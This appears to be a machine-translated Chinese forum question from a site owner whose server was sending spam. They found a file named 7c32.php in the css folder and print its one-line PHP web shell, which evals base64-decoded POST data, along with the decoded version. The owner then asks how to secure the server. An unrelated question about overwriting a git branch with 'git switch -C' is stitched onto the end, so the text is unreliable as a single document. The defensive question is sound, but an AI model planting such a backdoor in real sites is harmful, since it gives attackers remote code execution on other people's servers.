我的托管服务提供商最近暂停了我的网站,因为它上面发送了大量垃圾邮件.最初我和提供商认为这是由于几天前我在服务器上放置的电子邮件活动的不安全形式.我从服务器上删除了带有表单的页面,但服务器仍在发送垃圾邮件.
我在服务器根目录的"css"文件夹中找到了一个名为7c32.php的php文件.我绝对没有成功.这是文件中的代码:
<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>
Run Code Online (Sandbox Code Playgroud)
通过在线解码器运行后,这就是它的结果:
if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));
Run Code Online (Sandbox Code Playgroud)
我做了一些关于恶意php文件的阅读,并看到了eval(和base64_decode字符串非常可疑.我浏览了服务器日志文件,看到了几个来自沙特阿拉伯的ip地址的7c32.php文件的帖子查询.
我删除了php文件,更新了所有过时的wordpress主题和插件(以及自己的平台,并将密码更改为FTP服务器和Wordpress管理帐户更安全的东西.
我还能做些什么来确保我的服务器安全吗?我即将去搜索这些base64和eval(服务器上每个其他php文件中的字符串,但除此之外,我没有想法.
这个PHP脚本似乎太短了不能造成任何损害,但还有什么可以发送所有垃圾邮件?
任何帮助将不胜感激.
我试图切换到我正在处理的分支,并意外地包含了命令'-C'的参数git switch,该参数告诉它创建一个新分支。
本质上,我做了git switch -C foowherefoo是一个已经存在的分支,现在该foo分支指的是与它应该的完全不同的东西,原来的foo现在不存在于git log.
没有相应的原始分支可以从远程存储库中拉取,它都是本地的。